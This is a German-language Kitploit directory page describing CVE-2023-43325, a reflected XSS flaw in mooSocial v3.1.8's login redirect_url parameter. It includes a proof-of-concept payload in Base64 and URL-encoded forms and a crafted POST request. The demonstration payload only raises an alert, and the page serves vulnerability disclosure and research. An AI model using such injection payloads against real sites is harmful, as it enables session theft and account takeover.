Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-43325 — mooSocial v3.1.8 ist anfällig für Cross-Site-Scripting in der Benutzer-Login-Funktion. | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2023-43325
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubahrixia/cve-2023-43325

CVE-2023-43325

mooSocial v3.1.8 ist anfällig für Cross-Site-Scripting in der Benutzer-Login-Funktion.

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

mooSocial: XSS (CVE-2023-43325)

Eine reflektierte Cross-Site-Scripting (XSS)-Schwachstelle existiert im Parameter data[redirect_url] der Benutzeranmeldefunktion von mooSocial v3.1.8, die es Angreifern ermöglicht, die Sitzungscookies des Benutzers zu stehlen und über eine manipulierte URL dessen Konto zu übernehmen.

Verwundbarer Parameter: data[redirect_url]

Exploit - Proof of Concept (POC)

Reflektiertes Cross-Site-Scripting (XSS)

Payload : test">test 
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

POST-Anfrage an /moosocial/users/login (nur POST-Anfragedaten):

[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

Screenshot

image

Tool herunterladen